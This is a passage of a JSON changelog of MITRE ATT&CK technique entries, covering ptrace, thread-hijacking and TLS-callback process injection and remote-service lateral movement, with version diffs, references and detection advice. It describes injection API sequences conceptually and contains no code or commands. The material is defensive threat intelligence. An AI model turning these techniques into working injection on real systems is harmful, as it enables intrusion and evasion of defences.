"x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 12:30:14.640000+00:00\", \"old_value\": \"2020-11-10 18:29:31.031000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_data_sources'][0]\": \"Process: Process Modification\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1040: Behavior Prevention on Endpoint"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Access)",
"DS0009: Process (Process Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-14 01:33:19.065000+00:00",
"modified": "2021-10-18 12:26:31.766000+00:00",
"name": "Ptrace System Calls",
"description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes\u2019 memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1055/008",
"external_id": "T1055.008"
},
{
"source_name": "PTRACE man",
"description": "Kerrisk, M. (2020, February 9). PTRACE(2) - Linux Programmer's Manual. Retrieved February 21, 2020.",
"url": "http://man7.org/linux/man-pages/man2/ptrace.2.html"
},
{
"source_name": "Medium Ptrace JUL 2018",
"description": "Jain, S. (2018, July 25). Code injection in running process using ptrace. Retrieved February 21, 2020.",
"url": "https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be"
},
{
"source_name": "BH Linux Inject",
"description": "Colgan, T. (2015, August 15). Linux-Inject. Retrieved February 21, 2020.",
"url": "https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf"
},
{
"source_name": "ArtOfMemoryForensics",
"description": "Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017."
},
{
"source_name": "GNU Acct",
"description": "GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.",
"url": "https://www.gnu.org/software/acct/"
},
{
"source_name": "RHEL auditd",
"description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.",
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"
},
{
"source_name": "Chokepoint preload rootkits",
"description": "stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.",
"url": "http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Modification",
"Process: OS API Execution",
"Process: Process Access"
],
"x_mitre_defense_bypassed": [
"Anti-virus",
"Application control"
],
"x_mitre_detection": "Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 12:26:31.766000+00:00\", \"old_value\": \"2020-06-20 22:24:56.734000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \\n\\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes\\u2019 memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \\n\\nPtrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \\n\\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. \", \"old_value\": \"Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \\n\\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes\\u2019 memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \\n\\nPtrace system call injection may not be possible targeting processes with high-privileges, and on some system those that are non-child processes.(Citation: BH Linux Inject) \\n\\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. \", \"diff\": \"--- \\n+++ \\n@@ -2,6 +2,6 @@\\n \\n Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: malloc) then invoking that memory with PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the target processes\\u2019 memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \\n \\n-Ptrace system call injection may not be possible targeting processes with high-privileges, and on some system those that are non-child processes.(Citation: BH Linux Inject) \\n+Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) \\n \\n Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_data_sources'][0]\": \"Process: Process Modification\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may inject malicious code into processes via ptr | t | 1 | Adversaries may inject malicious code into processes via ptr |
| > | ace (process trace) system calls in order to evade process-b | > | ace (process trace) system calls in order to evade process-b | ||
| > | ased defenses as well as possibly elevate privileges. Ptrace | > | ased defenses as well as possibly elevate privileges. Ptrace | ||
| > | system call injection is a method of executing arbitrary co | > | system call injection is a method of executing arbitrary co | ||
| > | de in the address space of a separate live process. Ptrace | > | de in the address space of a separate live process. Ptrace | ||
| > | system call injection involves attaching to and modifying a | > | system call injection involves attaching to and modifying a | ||
| > | running process. The ptrace system call enables a debugging | > | running process. The ptrace system call enables a debugging | ||
| > | process to observe and control another process (and each in | > | process to observe and control another process (and each in | ||
| > | dividual thread), including changing memory and register val | > | dividual thread), including changing memory and register val | ||
| > | ues.(Citation: PTRACE man) Ptrace system call injection is c | > | ues.(Citation: PTRACE man) Ptrace system call injection is c | ||
| > | ommonly performed by writing arbitrary code into a running p | > | ommonly performed by writing arbitrary code into a running p | ||
| > | rocess (ex: <code>malloc</code>) then invoking that memory w | > | rocess (ex: <code>malloc</code>) then invoking that memory w | ||
| > | ith <code>PTRACE_SETREGS</code> to set the register containi | > | ith <code>PTRACE_SETREGS</code> to set the register containi | ||
| > | ng the next instruction to execute. Ptrace system call injec | > | ng the next instruction to execute. Ptrace system call injec | ||
| > | tion can also be done with <code>PTRACE_POKETEXT</code>/<cod | > | tion can also be done with <code>PTRACE_POKETEXT</code>/<cod | ||
| > | e>PTRACE_POKEDATA</code>, which copy data to a specific addr | > | e>PTRACE_POKEDATA</code>, which copy data to a specific addr | ||
| > | ess in the target processes\u2019 memory (ex: the current address | > | ess in the target processes\u2019 memory (ex: the current address | ||
| > | of the next instruction). (Citation: PTRACE man)(Citation: | > | of the next instruction). (Citation: PTRACE man)(Citation: | ||
| > | Medium Ptrace JUL 2018) Ptrace system call injection may n | > | Medium Ptrace JUL 2018) Ptrace system call injection may n | ||
| > | ot be possible targeting processes with high-privileges, and | > | ot be possible targeting processes that are non-child proces | ||
| > | on some system those that are non-child processes.(Citation | > | ses and/or have higher-privileges.(Citation: BH Linux Inject | ||
| > | : BH Linux Inject) Running code in the context of another | > | ) Running code in the context of another process may allow | ||
| > | process may allow access to the process's memory, system/net | > | access to the process's memory, system/network resources, a | ||
| > | work resources, and possibly elevated privileges. Execution | > | nd possibly elevated privileges. Execution via ptrace system | ||
| > | via ptrace system call injection may also evade detection fr | > | call injection may also evade detection from security produ | ||
| > | om security products since the execution is masked under a l | > | cts since the execution is masked under a legitimate process | ||
| > | egitimate process. | > | . |
OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state. \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1055/003",
"external_id": "T1055.003"
},
{
"source_name": "Elastic Process Injection July 2017",
"description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
"url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Modification",
"Process: OS API Execution",
"Process: Process Access"
],
"x_mitre_defense_bypassed": [
"Application control",
"Anti-virus"
],
"x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 12:22:50.800000+00:00\", \"old_value\": \"2020-11-10 18:29:30.941000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_data_sources'][0]\": \"Process: Process Modification\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1040: Behavior Prevention on Endpoint"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Access)",
"DS0009: Process (Process Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-01-14 01:30:41.092000+00:00",
"modified": "2021-10-18 12:24:54.198000+00:00",
"name": "Thread Local Storage",
"description": "Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. \n\nTLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process\u2019 memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process. ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1055/005",
"external_id": "T1055.005"
},
{
"source_name": "FireEye TLS Nov 2017",
"description": "Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved December 18, 2017.",
"url": "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html"
},
{
"source_name": "Elastic Process Injection July 2017",
"description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
"url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Modification",
"Process: OS API Execution",
"Process: Process Access"
],
"x_mitre_defense_bypassed": [
"Anti-virus",
"Application control"
],
"x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 12:24:54.198000+00:00\", \"old_value\": \"2020-11-10 18:29:30.984000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_data_sources'][0]\": \"Process: Process Modification\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1040: Behavior Prevention on Endpoint"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0009: Process (OS API Execution)",
"DS0009: Process (Process Access)",
"DS0009: Process (Process Modification)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2017-05-31 21:30:29.858000+00:00",
"modified": "2021-10-15 14:15:07.272000+00:00",
"name": "Remote Services",
"description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)\n\nLegitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1021",
"external_id": "T1021"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/555.html",
"external_id": "CAPEC-555"
},
{
"source_name": "SSH Secure Shell",
"description": "SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020.",
"url": "https://www.ssh.com/ssh"
},
{
"source_name": "TechNet Remote Desktop Services",
"description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.",
"url": "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx"
},
{
"source_name": "Remote Management MDM macOS",
"description": "Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021.",
"url": "https://support.apple.com/en-us/HT209161"
},
{
"source_name": "Kickstart Apple Remote Desktop commands",
"description": "Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021.",
"url": "https://support.apple.com/en-us/HT201710"
},
{
"source_name": "Apple Remote Desktop Admin Guide 3.3",
"description": "Apple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021.",
"url": "https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf"
},
{
"source_name": "FireEye 2019 Apple Remote Desktop",
"description": "Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil. Retrieved August 16, 2021.",
"url": "https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html"
},
{
"source_name": "Lockboxx ARD 2019",
"description": "Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021.",
"url": "http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html"
},
{
"source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing",
"description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.",
"url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Dan Borges, @1njection"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Network Traffic: Network Connection Creation",
"Network Traffic: Network Traffic Flow",
"Logon Session: Logon Session Creation",
"Command: Command Execution",
"Network Share: Network Share Access",
"Module: Module Load"
],
"x_mitre_detection": "Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. \n\nUse of applications such as ARD may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. \n\nIn macOS, you can review logs for \"screensharingd\" and \"Authentication\" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_system_requirements": [
"Active remote service accepting connections and valid credentials"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Dan Borges, @1njection\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 14:15:07.272000+00:00\", \"old_value\": \"2020-03-25 12:25:03.251000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\\n\\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)\\n\\nLegitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)\", \"old_value\": \"Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\\n\\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,5 @@\\n Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\\n \\n In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)\\n+\\n+Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. \\n\\nUse of applications such as ARD may be legitimate depending on the environment and how it\\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. \\n\\nIn macOS, you can review logs for \\\"screensharingd\\\" and \\\"Authentication\\\" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\", \"old_value\": \"Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement.\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,5 @@\\n-Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement.\\n+Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. \\n+\\n+Use of applications such as ARD may be legitimate depending on the environment and how it\\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. \\n+\\n+In macOS, you can review logs for \\\"screensharingd\\\" and \\\"Authentication\\\" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['external_references'][4]\": {\"source_name\": \"Remote Management MDM macOS\", \"description\": \"Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021.\", \"url\": \"https://support.apple.com/en-us/HT209161\"}, \"root['external_references'][5]\": {\"source_name\": \"Kickstart Apple Remote Desktop commands\", \"description\": \"Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021.\", \"url\": \"https://support.apple.com/en-us/HT201710\"}, \"root['external_references'][6]\": {\"source_name\": \"Apple Remote Desktop Admin Guide 3.3\", \"description\": \"Apple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021.\", \"url\": \"https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf\"}, \"root['external_references'][7]\": {\"source_name\": \"FireEye 2019 Apple Remote Desktop\", \"description\": \"Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil. Retrieved August 16, 2021.\", \"url\": 